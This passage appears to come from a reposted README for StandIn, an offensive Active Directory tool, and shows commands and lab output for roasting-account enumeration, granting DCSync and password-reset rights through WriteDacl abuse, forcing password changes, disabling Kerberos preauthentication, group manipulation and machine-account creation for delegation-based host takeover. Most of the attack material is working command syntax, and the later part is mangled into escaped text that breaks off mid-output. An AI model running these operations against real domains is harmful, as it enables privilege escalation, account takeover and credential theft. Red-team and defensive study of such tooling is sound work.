    StandIn.exe --object samaccountname=TMalone --asrep --remove
    StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Get a list of all ASREP roastable accounts
    StandIn.exe --asrep
    StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Get a list of all kerberoastable accounts
    StandIn.exe --spn
    StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # List all accounts with unconstrained & constrained delegation privileges
    StandIn.exe --delegation
    StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Get a list of all domain controllers
    StandIn.exe --dc

    # List group members
    StandIn.exe --group Literarum
    StandIn.exe --group "Magna Ultima" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Add user to group
    StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley"
    StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Create machine object
    StandIn.exe --computer Innsmouth --make
    StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Disable machine object
    StandIn.exe --computer Arkham --disable
    StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Delete machine object
    StandIn.exe --computer Danvers --delete
    StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties
    StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543
    StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties
    StandIn.exe --computer Miskatonic --remove
    StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

**LDAP Object Operations**

All object operations expect the LDAP filter to return a single object and will exit if your query returns more. This is by design.

**Get object**

**Use Case**

> _Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is a member of, or when a user account last authenticated to the domain._

**Syntax**

Get all properties of the resolved object. Queries can be simple matches for a single property or complex LDAP filters.

    C:\> StandIn.exe --object samaccountname=m-10-1909-01$

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=M-10-1909-01
        Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

    [?] Iterating object properties

    [+] logoncount
        |_ 360
    [+] codepage
        |_ 0
    [+] objectcategory
        |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
    [+] iscriticalsystemobject
        |_ False
    [+] operatingsystem
        |_ Windows 10 Enterprise
    [+] usnchanged
        |_ 195797
    [+] instancetype
        |_ 4
    [+] name
        |_ M-10-1909-01
    [+] badpasswordtime
        |_ 0x0
    [+] pwdlastset
        |_ 10/9/2020 4:42:02 PM UTC
    [+] serviceprincipalname
        |_ TERMSRV/M-10-1909-01
        |_ TERMSRV/m-10-1909-01.main.redhook.local
        |_ WSMAN/m-10-1909-01
        |_ WSMAN/m-10-1909-01.main.redhook.local
        |_ RestrictedKrbHost/M-10-1909-01
        |_ HOST/M-10-1909-01
        |_ RestrictedKrbHost/m-10-1909-01.main.redhook.local
        |_ HOST/m-10-1909-01.main.redhook.local
    [+] objectclass
        |_ top
        |_ person
        |_ organizationalPerson
        |_ user
        |_ computer
    [+] badpwdcount
        |_ 0
    [+] samaccounttype
        |_ SAM_MACHINE_ACCOUNT
    [+] lastlogontimestamp
        |_ 11/1/2020 7:40:09 PM UTC
    [+] usncreated
        |_ 31103
    [+] objectguid
        |_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0
    [+] localpolicyflags
        |_ 0
    [+] whencreated
        |_ 7/9/2020 4:59:55 PM
    [+] adspath
        |_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
    [+] useraccountcontrol
        |_ WORKSTATION_TRUST_ACCOUNT
    [+] cn
        |_ M-10-1909-01
    [+] countrycode
        |_ 0
    [+] primarygroupid
        |_ 515
    [+] whenchanged
        |_ 11/2/2020 7:59:32 PM
    [+] operatingsystemversion
        |_ 10.0 (18363)
    [+] dnshostname
        |_ m-10-1909-01.main.redhook.local
    [+] dscorepropagationdata
        |_ 10/30/2020 6:56:30 PM
        |_ 10/25/2020 1:28:32 AM
        |_ 7/16/2020 2:15:26 PM
        |_ 7/15/2020 8:54:17 PM
        |_ 1/1/1601 12:04:17 AM
    [+] lastlogon
        |_ 11/3/2020 10:21:11 AM UTC
    [+] distinguishedname
        |_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
    [+] msds-supportedencryptiontypes
        |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
    [+] samaccountname
        |_ M-10-1909-01$
    [+] objectsid
        |_ S-1-5-21-1293271031-3053586410-2290657902-1126
    [+] lastlogoff
        |_ 0
    [+] accountexpires
        |_ 0x7FFFFFFFFFFFFFFF

**Get object access permissions**

**Use Case**

> _At certain stages of the engagement, the operator may want to resolve the access permissions for a specific object in AD. Many permissions can offer an operational avenue to expand access or achieve objectives. For instance, a WriteDacl permission on a group could allow the operator to grant themselves permission to add a new user to the group. Tools like [SharpHound](https://github.com/BloodHoundAD/SharpHound3) already, in many instances, reveal these DACL weaknesses._

**Syntax**

Retrieve the [Active Directory](https://www.kitploit.com/search/label/Active%20Directory) rules that apply to the resolved object and translate any schema / rights GUIDs to their friendly name. Optionally filter the results by an NTAccount name.

    C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access

    [?] Using DC : m-w19-dc01.main.redhook.local
    [?] Object   : CN=M-10-1909-01
        Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : MAIN\domainjoiner
        |_ Group : MAIN\Domain Join

    [+] Object access rules

    [+] Identity --> NT AUTHORITY\SELF
        |_ Type       : Allow
        |_ Permission : CreateChild, DeleteChild
        |_ Object     : ANY

    [+] Identity --> NT AUTHORITY\Authenticated Users
        |_ Type       : Allow
        |_ Permission : GenericRead
        |_ Object     : ANY

    [... Snip ...]

    C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAIN\domainjoiner"

    [?] Using DC : m-w19-dc01.main.redhook.local
    [?] Object   : CN=M-10-1909-01
        Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : MAIN\domainjoiner
        |_ Group : MAIN\Domain Join

    [+] Object access rules

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead
        |_ Object     : ANY

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : WriteProperty
        |_ Object     : User-Account-Restrictions

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : Self
        |_ Object     : servicePrincipalName

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : Self
        |_ Object     : dNSHostName

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : WriteProperty
        |_ Object     : sAMAccountName

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : WriteProperty
        |_ Object     : displayName

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : WriteProperty
        |_ Object     : description

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : WriteProperty
        |_ Object     : User-Logon

    [+] Identity --> MAIN\domainjoiner
        |_ Type       : Allow
        |_ Permission : Self
        |_ Object     : DS-Validated-Write-Computer

**Grant object access permission**

**Use Case**

> _With the appropriate rights, the operator can grant an NTAccount special permissions over a specific object in AD. For instance, if an operator has GenericAll privileges over a user account they can grant themselves or a third-party NTAccount permission to change the user's password without knowing the current password._

**Syntax**

Add a permission to the resolved object for a specified NTAccount.
StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but it also allows operators to specify a custom rights GUID using the `--guid` flag.

    C:\> whoami
    main\s4uuser

    C:\> StandIn.exe --group lowPrivButMachineAccess

    [?] Using DC : m-w19-dc01.main.redhook.local
    [?] Group    : lowPrivButMachineAccess
        GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882

    [+] Members

    [?] Path           : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
        samAccountName : s4uUser
        Type           : User
        SID            : S-1-5-21-1293271031-3053586410-2290657902-1197

    C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\lowPrivButMachineAccess"

    [?] Using DC : m-w19-dc01.main.redhook.local
    [?] Object   : DC=main
        Path     : LDAP://DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : BUILTIN\Administrators
        |_ Group : BUILTIN\Administrators

    [+] Object access rules

    [+] Identity --> MAIN\lowPrivButMachineAccess
        |_ Type       : Allow
        |_ Permission : WriteDacl
        |_ Object     : ANY

    C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --grant "MAIN\s4uuser" --type DCSync

    [?] Using DC : m-w19-dc01.main.redhook.local
    [?] Object   : DC=main
        Path     : LDAP://DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : BUILTIN\Administrators
        |_ Group : BUILTIN\Administrators

    [+] Set object access rules
        |_ Success, added dcsync privileges to object for MAIN\s4uuser

    C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\s4uUser"

    [?] Using DC : m-w19-dc01.main.redhook.local
    [?] Object   : DC=main
        Path     : LDAP://DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : BUILTIN\Administrators
        |_ Group : BUILTIN\Administrators

    [+] Object access rules

    [+] Identity --> MAIN\s4uUser
        |_ Type       : Allow
        |_ Permission : ExtendedRight
        |_ Object     : DS-Replication-Get-Changes-All

    [+] Identity --> MAIN\s4uUser
        |_ Type       : Allow
        |_ Permission : ExtendedRight
        |_ Object     : DS-Replication-Get-Changes

    [+] Identity --> MAIN\s4uUser
        |_ Type       : Allow
        |_ Permission : ExtendedRight
        |_ Object     : DS-Replication-Get-Changes-In-Filtered-Set

**Set object password**

**Use Case**

> _If the operator has `User-Force-Change-Password` permissions over a user object they can change the password for that user account without knowing the current password. This action is destructive, as the user will no longer be able to authenticate, which may raise alarm bells._

**Syntax**

Set the resolved object's password without knowing the current password.

    C:\> whoami
    main\s4uuser

    C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\lowPrivButMachineAccess"

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=User 005
        Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : MAIN\Domain Admins
        |_ Group : MAIN\Domain Admins

    [+] Object access rules

    [+] Identity --> MAIN\lowPrivButMachineAccess
        |_ Type       : Allow
        |_ Permission : WriteDacl
        |_ Object     : ANY

    C:\> StandIn.exe --object "samaccountname=user005" --grant "MAIN\s4uuser" --type resetpassword

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=User 005
        Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : MAIN\Domain Admins
        |_ Group : MAIN\Domain Admins

    [+] Set object access rules
        |_ Success, added resetpassword privileges to object for MAIN\s4uuser

    C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\s4uUser"

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=User 005
        Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : MAIN\Domain Admins
        |_ Group : MAIN\Domain Admins

    [+] Object access rules

    [+] Identity --> MAIN\s4uUser
        |_ Type       : Allow
        |_ Permission : ExtendedRight
        |_ Object     : User-Force-Change-Password

    C:\> StandIn.exe --object "samaccountname=user005" --newpass "Arkh4mW1tch!"

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=User 005
        Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

    [+] Object properties
        |_ Owner : MAIN\Domain Admins
        |_ Group : MAIN\Domain Admins

    [+] Setting account password
        |_ Success, password set for object

**Add/Remove ASREP from object flags**

**Use Case**

> _If the operator has write access to a user account, they can modify the user's `userAccountControl` flags to include `DONT_REQUIRE_PREAUTH`. Doing so allows the operator to request an AS-REP hash for the user which can be cracked offline. This process is very similar to kerberoasting. This action is not destructive, but it relies on the user having a password which can be cracked in a reasonable timeframe._

**Syntax**

Add and remove `DONT_REQUIRE_PREAUTH` from the resolved object's `userAccountControl` flags.

    C:\> StandIn.exe --object "samaccountname=user005" --asrep

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=User 005
        Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

    [*] SamAccountName     : user005
        DistinguishedName  : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
        userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD

    [+] Updating userAccountControl..
        |_ Success

    C:\> StandIn.exe --asrep

    [?] Using DC : m-w16-dc01.main.redhook.local

    [?] Found 1 object(s) that do not require Kerberos preauthentication..

    [*] SamAccountName     : user005
        DistinguishedName  : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
        userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

    C:\> StandIn.exe --object "samaccountname=user005" --asrep --remove

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Object   : CN=User 005
        Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

    [*] SamAccountName     : user005
        DistinguishedName  : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
        userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

    [+] Updating userAccountControl..
        |_ Success

    C:\> StandIn.exe --asrep

    [?] Using DC : m-w16-dc01.main.redhook.local

    [?] Found 0 object(s) that do not require Kerberos preauthentication..

**ASREP**

**Use Case**

> _This function enumerates all accounts in AD which are currently enabled and have `DONT_REQUIRE_PREAUTH` as part of their `userAccountControl` flags. These accounts can be AS-REP roasted; this process is very similar to kerberoasting._

**Syntax**

Return all accounts that are ASREP roastable.

    C:\> StandIn.exe --asrep

    [?] Using DC : m-w16-dc01.main.redhook.local

    [?] Found 1 object(s) that do not require Kerberos preauthentication..

    [*] SamAccountName     : user005
        DistinguishedName  : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
        userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

**SPN**

**Use Case**

> _This function enumerates all accounts in AD which are currently enabled and can be kerberoasted. Some basic account information is added for context: when the password was last set, when the account was last used and what [encryption](https://www.kitploit.com/search/label/Encryption) types are supported._

**Syntax**

Return all accounts that are kerberoastable.

    C:\> StandIn.exe --spn

    [?] Using DC : m-w16-dc01.main.redhook.local
    [?] Found 1 kerberostable users..

    [*] SamAccountName       : SimCritical
        DistinguishedName    : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
        ServicePrincipalName : ldap/M-2012R2-03.main.redhook.local
        PwdLastSet           : 11/2/2020 7:06:17 PM UTC
        lastlogon            : 0x0
        Supported ETypes     : RC4_HMAC_DEFAULT

**Unconstrained / constrained / resource-based constrained delegation**

**Use Case**

> _This function enumerates all accounts that are permitted to perform [unconstrained](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation), [constrained](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation), or [resource-based constrained](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution) delegation. These assets can be used to expand access or achieve objectives._

**Syntax**

Return all accounts that have either unconstrained or constrained delegation permissions, or have inbound resource-based constrained delegation privileges.

    C:\> StandIn.exe --delegation

    [?] Using DC : m-w16-dc01.main.redhook.local

    [?] Found 3 object(s) with unconstrained delegation..

    [*] SamAccountName     : M-2019-03$
        DistinguishedName  : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
        userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

    [*] SamAccountName     : M-W16-DC01$
        DistinguishedName  : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
        userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

    [*] SamAccountName     : M-W19-DC01$
        DistinguishedName  : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
        userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

    [?] Found 2 object(s) with constrained delegation..

    [*] SamAccountName           : M-2019-04$
        DistinguishedName        : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
        msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local
                                   HOST/m-w16-dc01.main.redhook.local
                                   HOST/M-W16-DC01
                                   HOST/m-w16-dc01.main.redhook.local/MAIN
                                   HOST/M-W16-DC01/MAIN
        Protocol Transition      : False
        userAccountControl       : WORKSTATION_TRUST_ACCOUNT

    [*] SamAccountName           : M-2019-05$
        DistinguishedName        : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
        msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local
                                   cifs/M-2012R2-03
        Protocol Transition      : True
        userAccountControl       : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

    [?] Found 1 object(s) with resource-based constrained delegation..
\n \n [*] SamAccountName : M-10-1909-01$ \n DistinguishedName : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n Inbound Delegation : Server Admins [GROUP] \n userAccountControl : WORKSTATION_TRUST_ACCOUNT \n \n\n \n** DC's ** \n \n** Use Case ** \n\n\n> _ This function provides situational awareness by finding all domain controllers and listing some of their properties including their role assignments. _\n\n \n** Syntax ** \n\n\nGet all domain controllers. \n \n \n C:\\> StandIn.exe --dc \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n |_ Domain : main.redhook.local \n \n [*] Host : m-w16-dc01.main.redhook.local \n Domain : main.redhook.local \n Forest : main.redhook.local \n SiteName : Default-First-Site-Name \n IP : 10.42.54.5 \n OSVersion : Windows Server 2016 Datacenter \n Local System Time UTC : Tuesday, 03 November 2020 03:29:17 \n Role : SchemaRole \n NamingRole \n PdcRole \n RidRole \n InfrastructureRole \n \n [*] Host : m-w19-dc01.main.redhook.local \n Domain : main.redhook.local \n Forest : main.redhook.local \n SiteName : Default-First-Site-Name \n IP : 10.42.54.13 \n OSVersion : Windows Server 2019 Datacenter \n Local System Time UTC : Tuesday, 03 November 2020 03:29:17 \n \n\n \n** Groups Operations ** \n\n\nThese functions deal specificaly with domain groups. \n\n \n** List group membership ** \n \n** Use Case ** \n\n\n> _ This function provides situational awareness, listing all members of a domain group including their type (user or nested group). _\n\n \n** Syntax ** \n\n\nEnumerate group membership and provide rudementary details for the member objects. \n \n \n C:\\> StandIn.exe --group \"Server Admins\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : Server Admins \n GUID : 92af8954-58cc-4fa4-a9ba-69bfa5524b5c \n \n [+] Members \n \n [?] 
Path : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : Workstation Admins \n Type : Group \n SID : S-1-5-21-1293271031-3053586410-2290657902-1108 \n \n [?] Path : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin001 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1111 \n \n [?] Path : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin002 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1184 \n \n [?] Path : LDAP://CN =Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin003 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1185 \n \n [?] Path : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin004 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1186 \n \n [?] Path : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin005 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1187 \n \n [?] Path : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : SimCritical \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1204 \n \n\n \n** Add user to group ** \n \n** Use Case ** \n\n\n> _ With appropriate access the operator can add an NTAccount to a domain group. _\n\n \n** Syntax ** \n\n\nAdd an NTAccount [ identifier ](<https://www.kitploit.com/search/label/Identifier> \"identifier\" ) to a domain group. Normally this would be a user but it could also be a group. \n \n \n C:\\> StandIn.exe --group lowprivbutmachineaccess \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Members \n \n [?] 
Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : s4uUser \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1197 \n \n C:\\> StandIn.exe --group lowprivbutmachineaccess --ntaccount \"MAIN\\user001\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Adding user to group \n |_ Success \n \n C:\\> StandIn.exe --group lowprivbutmachineaccess \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Members \n \n [?] Path : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : user001 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1106 \n \n [?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : s4uUser \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1197 \n \n\n \n** Machine Object Operations ** \n\n\nThese functions are specifically for machine operations and expect the machine name as input. \n\n \n** Create machine object ** \n \n** Use Case ** \n\n\n> _ The operator may wish to create a machine object in order to perform a [ resource based constrained delegation ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution> \"resource based constrained delegation\" ) attack. By default any domain user has the ability to create up to 10 machines on the local domain. _\n\n \n** Syntax ** \n\n\nCreate a new machine object with a random password; the user's ` ms-DS-MachineAccountQuota ` limit applies to this operation. \n \n \n C:\\> StandIn.exe --computer M-1337-b33f --make \n \n [?] 
Using DC : m-w16-dc01.main.redhook.local \n |_ Domain : main.redhook.local \n |_ DN : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local \n |_ Password : MlCGkaacS5SRUOt \n \n [+] Machine account added to AD.. \n \n\nThe ` ms-DS-MachineAccountQuota ` property exists in the domain root object. If you need to verify the quota you can perform an object search as shown below. \n \n \n C:\\> StandIn.exe --object ms-DS-MachineAccountQuota=* \n \n\n \n** Disable machine object ** \n \n** Use Case ** \n\n\n> _ Standard users do not have the ability to delete a machine object; however, a user that creates a machine can thereafter disable the machine object. _\n\n \n** Syntax ** \n\n\nDisable a machine that was previously created. This action should be performed in the context of the same user that created the machine. Note that non-elevated users can't delete machine objects, only disable them. \n \n \n C:\\> StandIn.exe --computer M-1337-b33f --disable \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-1337-b33f \n Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local \n \n [+] Machine account currently enabled \n |_ Account disabled.. \n \n\n \n** Delete machine object ** \n \n** Use Case ** \n\n\n> _ With elevated AD privileges the operator can delete a machine object, such as one created earlier in the attack chain. _\n\n \n** Syntax ** \n\n\nUse an elevated context to delete a machine object. \n \n \n C:\\> StandIn.exe --computer M-1337-b33f --delete \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] 
Object : CN=M-1337-b33f \n Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local \n \n [+] Machine account deleted from AD \n \n\n \n** Add msDS-AllowedToActOnBehalfOfOtherIdentity ** \n \n** Use Case ** \n\n\n> _ With write access to a machine object this function allows the operator to add an ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property to the machine, which is required to perform a [ resource based constrained delegation ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution> \"resource based constrained delegation\" ) attack. _\n\n \n** Syntax ** \n\n\nAdd an ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property to the machine along with a SID to facilitate host takeover using resource based constrained delegation. \n \n \n C:\\> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205 \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-03 \n Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity \n \n C:\\> StandIn.exe --object samaccountname=m-10-1909-03$ \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-03 \n Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [?] 
Iterating object properties \n \n [+] logoncount \n |_ 107 \n [+] codepage \n |_ 0 \n [+] objectcategory \n |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local \n [+] iscriticalsystemobject \n |_ False \n [+] operatingsystem \n |_ Windows 10 Enterprise \n [+] usnchanged \n |_ 195771 \n [+] instancetype \n |_ 4 \n [+] name \n |_ M-10-1909-03 \n [+] badpasswordtime \n |_ 7/9/2020 5:07:11 PM UTC \n [+] pwdlastset \n |_ 10/29/2020 6:44:08 PM UTC \n [+] serviceprincipalname \n |_ TERMSRV/M-10-1909-03 \n |_ TERMSRV/m-10-1909-03.main.redhook.local \n |_ WSMAN/m-10-1909-03 \n |_ WSMAN/m-10-1909-03.main.redhook.local \n |_ RestrictedKrbHost/M-10-1909-03 \n |_ HOST/M-10-1909-03 \n |_ RestrictedKrbHost/m-10-1909-03.main.redhook.local \n |_ HOST/m-10-1909-03.main.redhook.local \n [+] objectclass \n |_ top \n |_ person \n |_ organizationalPerson \n |_ user \n |_ computer \n [+] badpwdcount \n |_ 0 \n [+] samaccounttype \n |_ SAM_MACHINE_ACCOUNT \n [+] lastlogontimestamp \n |_ 10/29/2020 12:29:26 PM UTC \n [+] usncreated \n |_ 31127 \n [+] objectguid \n |_ c02cff97-4bfd-457c-a568-a748b0725c2f \n [+] localpolicyflags \n |_ 0 \n [+] whencreated \n |_ 7/9/2020 5:05:08 PM \n [+] adspath \n |_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] useraccountcontrol \n |_ WORKSTATION_TRUST_ACCOUNT \n [+] cn \n |_ M-10-1909-03 \n [+] countrycode \n |_ 0 \n [+] primarygroupid \n |_ 515 \n [+] whenchanged \n |_ 11/2/2020 7:55:14 PM \n [+] operatingsystemversion \n |_ 10.0 (18363) \n [+] dnshostname \n |_ m-10-1909-03.main.redhook.local \n [+] dscorepropagationdata \n |_ 10/30/2020 6:56:30 PM \n |_ 10/30/2020 10:55:22 AM \n |_ 10/29/2020 4:58:51 PM \n |_ 10/29/2020 4:58:29 PM \n |_ 1/1/1601 12:00:01 AM \n [+] lastlogon \n |_ 11/2/2020 9:07:20 AM UTC \n [+] distinguishedname \n |_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] msds-supportedencryptiontypes \n |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, 
